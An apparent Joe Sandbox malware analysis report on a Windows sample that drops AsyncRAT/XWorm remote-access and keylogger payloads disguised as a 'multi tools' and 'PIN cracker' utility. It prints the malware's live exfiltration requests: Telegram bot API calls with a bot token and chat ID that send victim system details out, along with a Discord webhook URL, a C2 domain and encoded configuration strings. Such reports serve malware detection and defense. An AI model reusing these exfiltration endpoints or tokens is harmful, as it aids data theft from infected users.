                            Source: Joe Sandbox ViewASN Name: SALSGIVERUS SALSGIVERUS
                            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                            Source: unknownDNS query: name: ip-api.com
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: global trafficHTTP traffic detected: GET /bot7517837255:AAFFYwsM3RAJTfnCWwagMLHeBQRG-F4UScg/sendMessage?chat_id=7538845070&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AE3C0EEEB514F72781BA2%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20ELOET%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.2 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /bot7517837255:AAFFYwsM3RAJTfnCWwagMLHeBQRG-F4UScg/sendMessage?chat_id=7538845070&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AE3C0EEEB514F72781BA2%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20ELOET%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.2 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                            Source: global trafficDNS traffic detected: DNS query: ip-api.com
                            Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                            Source: global trafficDNS traffic detected: DNS query: carolina-comes.gl.at.ply.gg
                            Source: adawsfaefasfasfg.exe, 00000002.00000002.2592447973.00000000031A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                            Source: powershell.exe, 00000010.00000002.1807879075.0000012AF6474000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mic
                            Source: powershell.exe, 00000010.00000002.1807879075.0000012AF6474000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micft.cMicRosof
                            Source: powershell.exe, 00000008.00000002.1498209916.0000015D7A900000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
                            Source: powershell.exe, 00000008.00000002.1498209916.0000015D7A900000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro/pki/crl/productCerAut_2010-06-2
                            Source: powershell.exe, 00000016.00000002.2385958068.000001286FCB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.v
                            Source: qmgr.db.31.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                            Source: qmgr.db.31.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                            Source: qmgr.db.31.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                            Source: qmgr.db.31.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                            Source: qmgr.db.31.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                            Source: svchost.exe, 0000001F.00000002.2580889401.0000024CFD102000.00000004.00000020.00020000.00000000.sdmp, qmgr.db.31.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                            Source: qmgr.db.31.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                            Source: ozgpPwVAu1.exe, 00000000.00000002.1326803778.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, adawsfaefasfasfg.exe, 00000002.00000002.2592447973.0000000003081000.00000004.00000800.00020000.00000000.sdmp, adawsfaefasfasfg.exe, 00000002.00000000.1322668659.0000000000EB2000.00000002.00000001.01000000.00000006.sdmp, wasdwasfwasfs.exe, 00000003.00000002.2591449977.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp, wasdwasfwasfs.exe, 00000003.00000000.1323412676.0000000000C82000.00000002.00000001.01000000.00000007.sdmp, adawsfaefasfasfg.exe.0.dr, wasdwasfwasfs.exe.0.dr, Systen User.2.drString found in binary or memory: http://ip-api.com/line/?fields=hosting
                            Source: powershell.exe, 00000009.00000002.1470720955.000002853FD37000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1761595477.0000013FDF314000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1750246959.0000012AEDCC4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2055474118.0000017199AE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2345723056.00000128678CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                            Source: powershell.exe, 0000000E.00000002.1823526191.0000013FE78E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://osoft.co
                            Source: powershell.exe, 00000016.00000002.2136055333.0000012857A89000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                            Source: powershell.exe, 00000008.00000002.1413749213.0000015D62429000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1412534773.000002852FEE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1555270609.0000013FCF4C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1551198166.0000012ADDE79000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1878175975.0000017189C9B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2136055333.0000012857A89000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                            Source: adawsfaefasfasfg.exe, 00000002.00000002.2592447973.0000000003081000.00000004.00000800.00020000.00000000.sdmp, wasdwasfwasfs.exe, 00000003.00000002.2591449977.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1413749213.0000015D62201000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1412534773.000002852FCC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1555270609.0000013FCF2A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1551198166.0000012ADDC51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1878175975.0000017189A71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2136055333.0000012857861000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                            Source: powershell.exe, 00000008.00000002.1413749213.0000015D62429000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1412534773.000002852FEE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1555270609.0000013FCF4C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1551198166.0000012ADDE79000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1878175975.0000017189C9B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2136055333.0000012857A89000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                            Source: powershell.exe, 0000000E.00000002.1820911519.0000013FE7850000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wwcrosoft.com/pki/certs/MicWinPCA_2010-07-06.crt0
                            Source: powershell.exe, 00000016.00000002.2136055333.0000012857A89000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                            Source: powershell.exe, 00000008.00000002.1498209916.0000015D7A900000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.micom/pki/certs/Miut_2010-06-23.cr
                            Source: powershell.exe, 00000009.00000002.1492888192.00000285480D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.micom/pkiops/Docs/ry.htm0
                            Source: powershell.exe, 0000000E.00000002.1819411525.0000013FE7783000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.$
                            Source: powershell.exe, 0000000E.00000002.1823526191.0000013FE78E3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2396145614.0000012870040000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
                            Source: powershell.exe, 00000016.00000002.2393163849.000001286FE40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.coO
                            Source: powershell.exe, 00000009.00000002.1497525479.000002854858D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.coj
                            Source: powershell.exe, 00000008.00000002.1413749213.0000015D62201000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1412534773.000002852FCC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1555270609.0000013FCF2A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1551198166.0000012ADDC51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1878175975.0000017189A71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2136055333.0000012857861000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                            Source: adawsfaefasfasfg.exe, 00000002.00000002.2592447973.0000000003184000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegrP
                            Source: adawsfaefasfasfg.exe, 00000002.00000002.2592447973.0000000003184000.00000004.00000800.00020000.00000000.sdmp, adawsfaefasfasfg.exe, 00000002.00000002.2592447973.00000000030CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                            Source: ozgpPwVAu1.exe, 00000000.00000002.1326803778.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, adawsfaefasfasfg.exe, 00000002.00000000.1322668659.0000000000EB2000.00000002.00000001.01000000.00000006.sdmp, adawsfaefasfasfg.exe, 00000002.00000002.2592447973.00000000030CA000.00000004.00000800.00020000.00000000.sdmp, wasdwasfwasfs.exe, 00000003.00000002.2591449977.0000000002EEA000.00000004.00000800.00020000.00000000.sdmp, wasdwasfwasfs.exe, 00000003.00000000.1323412676.0000000000C82000.00000002.00000001.01000000.00000007.sdmp, adawsfaefasfasfg.exe.0.dr, wasdwasfwasfs.exe.0.dr, Systen User.2.drString found in binary or memory: https://api.telegram.org/bot
                            Source: adawsfaefasfasfg.exe, 00000002.00000002.2592447973.00000000030CA000.00000004.00000800.00020000.00000000.sdmp, adawsfaefasfasfg.exe, 00000002.00000002.2592447973.0000000003180000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7517837255:AAFFYwsM3RAJTfnCWwagMLHeBQRG-F4UScg/sendMessage?chat_id=75388
                            Source: powershell.exe, 00000016.00000002.2345723056.00000128678CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                            Source: powershell.exe, 00000016.00000002.2345723056.00000128678CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                            Source: powershell.exe, 00000016.00000002.2345723056.00000128678CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                            Source: PIN CRACKER V2.bat.0.drString found in binary or memory: https://discord.gg/2e8UXZp2Fq
                            Source: where.exe, 00000007.00000002.1328741520.0000028CA97B4000.00000004.00000020.00020000.00000000.sdmp, PIN CRACKER V2.bat.0.drString found in binary or memory: https://discordapp.com/api/webhooks/1309170780696870912/8yNfzeRdjxyYLYxaut1-j0gdfkndb6ZneH0LI8EP6wjx
                            Source: qmgr.db.31.drString found in binary or memory: https://g.live.com/odclientsettings/Prod-C:
                            Source: svchost.exe, 0000001F.00000003.2560713768.0000024CFDDA0000.00000004.00000800.00020000.00000000.sdmp, edb.log.31.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2-C:
                            Source: powershell.exe, 00000016.00000002.2136055333.0000012857A89000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                            Source: powershell.exe, 00000009.00000002.1470720955.000002853FD37000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1761595477.0000013FDF314000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1750246959.0000012AEDCC4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2055474118.0000017199AE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2345723056.00000128678CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49958
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
                            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49825 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49958 version: TLS 1.2

                            Key, Mouse, Clipboard, Microphone and Screen Capturing

                            barindex
                            Source: adawsfaefasfasfg.exe.0.dr, XLogger.cs.Net Code: KeyboardLayout
                            Source: wasdwasfwasfs.exe.0.dr, XLogger.cs.Net Code: KeyboardLayout
                            Source: 0.2.ozgpPwVAu1.exe.2d3e598.2.raw.unpack, XLogger.cs.Net Code: KeyboardLayout
                            Source: 0.2.ozgpPwVAu1.exe.2d24b30.1.raw.unpack, XLogger.cs.Net Code: KeyboardLayout
                            Source: 0.2.ozgpPwVAu1.exe.2d1a0f0.3.raw.unpack, XLogger.cs.Net Code: KeyboardLayout
                            Source: Systen User.2.dr, XLogger.cs.Net Code: KeyboardLayout

                            Operating System Destruction

                            barindex
                            Source: C:\Users\user\adawsfaefasfasfg.exeProcess information set: 01 00 00 00 Jump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeProcess information set: 01 00 00 00 Jump to behavior

                            System Summary

                            barindex
                            Source: 3.0.wasdwasfwasfs.exe.c80000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                            Source: 0.2.ozgpPwVAu1.exe.2d3e598.2.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                            Source: 0.2.ozgpPwVAu1.exe.2d1a0f0.3.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                            Source: 2.0.adawsfaefasfasfg.exe.eb0000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                            Source: 0.2.ozgpPwVAu1.exe.2d24b30.1.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                            Source: 0.2.ozgpPwVAu1.exe.2d3e598.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                            Source: 0.2.ozgpPwVAu1.exe.2d1a0f0.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                            Source: 0.2.ozgpPwVAu1.exe.2d24b30.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                            Source: 00000002.00000000.1322668659.0000000000EB2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                            Source: 00000000.00000002.1326803778.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                            Source: 00000003.00000000.1323412676.0000000000C82000.00000002.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                            Source: C:\Users\user\wasdwasfwasfs.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                            Source: C:\Users\user\adawsfaefasfasfg.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                            Source: C:\Users\user\AppData\Roaming\Systen User, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                            Source: C:\Users\user\Desktop\ozgpPwVAu1.exeFile created: C:\Users\user\PIN CRACKER V2.batJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeCode function: 2_2_00007FF887D25CC62_2_00007FF887D25CC6
                            Source: C:\Users\user\adawsfaefasfasfg.exeCode function: 2_2_00007FF887D212D92_2_00007FF887D212D9
                            Source: C:\Users\user\adawsfaefasfasfg.exeCode function: 2_2_00007FF887D26A722_2_00007FF887D26A72
                            Source: C:\Users\user\adawsfaefasfasfg.exeCode function: 2_2_00007FF887D21CFD2_2_00007FF887D21CFD
                            Source: C:\Users\user\wasdwasfwasfs.exeCode function: 3_2_00007FF887D154463_2_00007FF887D15446
                            Source: C:\Users\user\wasdwasfwasfs.exeCode function: 3_2_00007FF887D113013_2_00007FF887D11301
                            Source: C:\Users\user\wasdwasfwasfs.exeCode function: 3_2_00007FF887D161F23_2_00007FF887D161F2
                            Source: C:\Users\user\wasdwasfwasfs.exeCode function: 3_2_00007FF887D19CF03_2_00007FF887D19CF0
                            Source: C:\Users\user\AppData\Roaming\Systen UserCode function: 26_2_00007FF887D312D926_2_00007FF887D312D9
                            Source: C:\Users\user\AppData\Roaming\Systen UserCode function: 26_2_00007FF887D31CFD26_2_00007FF887D31CFD
                            Source: ozgpPwVAu1.exe, 00000000.00000002.1326803778.0000000002D01000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameadawsfaefasfasfg.exe4 vs ozgpPwVAu1.exe
                            Source: ozgpPwVAu1.exe, 00000000.00000002.1326803778.0000000002D01000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewasdwasfwasfs.exe4 vs ozgpPwVAu1.exe
                            Source: ozgpPwVAu1.exe, 00000000.00000002.1327150654.000000001B958000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamead vs ozgpPwVAu1.exe
                            Source: ozgpPwVAu1.exeBinary or memory string: OriginalFilenameNXS MULTI TOOLS V5.exe4 vs ozgpPwVAu1.exe
                            Source: ozgpPwVAu1.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                            Source: 3.0.wasdwasfwasfs.exe.c80000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                            Source: 0.2.ozgpPwVAu1.exe.2d3e598.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                            Source: 0.2.ozgpPwVAu1.exe.2d1a0f0.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                            Source: 2.0.adawsfaefasfasfg.exe.eb0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                            Source: 0.2.ozgpPwVAu1.exe.2d24b30.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                            Source: 0.2.ozgpPwVAu1.exe.2d3e598.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                            Source: 0.2.ozgpPwVAu1.exe.2d1a0f0.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                            Source: 0.2.ozgpPwVAu1.exe.2d24b30.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                            Source: 00000002.00000000.1322668659.0000000000EB2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                            Source: 00000000.00000002.1326803778.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                            Source: 00000003.00000000.1323412676.0000000000C82000.00000002.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                            Source: C:\Users\user\wasdwasfwasfs.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                            Source: C:\Users\user\adawsfaefasfasfg.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                            Source: C:\Users\user\AppData\Roaming\Systen User, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                            Source: ozgpPwVAu1.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: ozgpPwVAu1.exeStatic PE information: Section: .rsrc ZLIB complexity 0.9910519622093024
                            Source: ozgpPwVAu1.exe, TGZL3mfzzUkOgkHp4g0oyQycwm9mvPij2rxscxy.csCryptographic APIs: 'TransformFinalBlock'
                            Source: adawsfaefasfasfg.exe.0.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
                            Source: adawsfaefasfasfg.exe.0.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
                            Source: adawsfaefasfasfg.exe.0.dr, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
                            Source: wasdwasfwasfs.exe.0.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
                            Source: wasdwasfwasfs.exe.0.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
                            Source: wasdwasfwasfs.exe.0.dr, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
                            Source: 0.2.ozgpPwVAu1.exe.2d3e598.2.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                            Source: 0.2.ozgpPwVAu1.exe.2d3e598.2.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                            Source: 0.2.ozgpPwVAu1.exe.2d3e598.2.raw.unpack, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
                            Source: 0.2.ozgpPwVAu1.exe.2d24b30.1.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                            Source: 0.2.ozgpPwVAu1.exe.2d24b30.1.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                            Source: adawsfaefasfasfg.exe.0.dr, Settings.csBase64 encoded string: 'LqfX5mhN3Y8Qc2I8YQoMBANuJPoRALzbamtix4oI48cy/xZRZLQZPB3nb0dcarIgIxWy5IiCSZr+0kXCT2e1AA==', 'KV+jkX41MNJNjZw0OvfFyIiDKmbex/GFVzK7GiJAaZ3EK2GxEEVhUrusa5ptTKn3'
                            Source: wasdwasfwasfs.exe.0.dr, Settings.csBase64 encoded string: 'JrNV/jMUjHR6tXpIQ7iruOLIvH47ucmK9ajd/QDfRGxvH9xLpHdWMtcYMX0D9yqM'
                            Source: 0.2.ozgpPwVAu1.exe.2d3e598.2.raw.unpack, Settings.csBase64 encoded string: 'JrNV/jMUjHR6tXpIQ7iruOLIvH47ucmK9ajd/QDfRGxvH9xLpHdWMtcYMX0D9yqM'
                            Source: 0.2.ozgpPwVAu1.exe.2d24b30.1.raw.unpack, Settings.csBase64 encoded string: 'LqfX5mhN3Y8Qc2I8YQoMBANuJPoRALzbamtix4oI48cy/xZRZLQZPB3nb0dcarIgIxWy5IiCSZr+0kXCT2e1AA==', 'KV+jkX41MNJNjZw0OvfFyIiDKmbex/GFVzK7GiJAaZ3EK2GxEEVhUrusa5ptTKn3'
                            Source: 0.2.ozgpPwVAu1.exe.2d1a0f0.3.raw.unpack, Settings.csBase64 encoded string: 'LqfX5mhN3Y8Qc2I8YQoMBANuJPoRALzbamtix4oI48cy/xZRZLQZPB3nb0dcarIgIxWy5IiCSZr+0kXCT2e1AA==', 'KV+jkX41MNJNjZw0OvfFyIiDKmbex/GFVzK7GiJAaZ3EK2GxEEVhUrusa5ptTKn3'
                            Source: Systen User.2.dr, Settings.csBase64 encoded string: 'LqfX5mhN3Y8Qc2I8YQoMBANuJPoRALzbamtix4oI48cy/xZRZLQZPB3nb0dcarIgIxWy5IiCSZr+0kXCT2e1AA==', 'KV+jkX41MNJNjZw0OvfFyIiDKmbex/GFVzK7GiJAaZ3EK2GxEEVhUrusa5ptTKn3'
                            Source: adawsfaefasfasfg.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                            Source: adawsfaefasfasfg.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                            Source: 0.2.ozgpPwVAu1.exe.2d1a0f0.3.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                            Source: 0.2.ozgpPwVAu1.exe.2d1a0f0.3.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                            Source: wasdwasfwasfs.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                            Source: wasdwasfwasfs.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                            Source: 0.2.ozgpPwVAu1.exe.2d24b30.1.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                            Source: 0.2.ozgpPwVAu1.exe.2d24b30.1.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                            Source: 0.2.ozgpPwVAu1.exe.2d3e598.2.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                            Source: 0.2.ozgpPwVAu1.exe.2d3e598.2.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                            Source: Systen User.2.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                            Source: Systen User.2.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@37/37@3/4
                            Source: C:\Users\user\Desktop\ozgpPwVAu1.exeFile created: C:\Users\user\adawsfaefasfasfg.exeJump to behavior
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5408:120:WilError_03
                            Source: C:\Users\user\AppData\Roaming\Systen UserMutant created: NULL
                            Source: C:\Users\user\wasdwasfwasfs.exeMutant created: \Sessions\1\BaseNamedObjects\p3YdZDJ8ethXsiAZ
                            Source: C:\Windows\System32\OpenWith.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5804:120:WilError_03
                            Source: C:\Users\user\adawsfaefasfasfg.exeMutant created: \Sessions\1\BaseNamedObjects\DpaQ0HHJ8Dn0bxYG
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:848:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8048:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7832:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7788:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8092:120:WilError_03
                            Source: C:\Users\user\Desktop\ozgpPwVAu1.exeMutant created: \Sessions\1\BaseNamedObjects\DmSq17kOSCazTZ1HX
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8040:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1816:120:WilError_03
                            Source: C:\Users\user\adawsfaefasfasfg.exeFile created: C:\Users\user\AppData\Local\Temp\Log.tmpJump to behavior
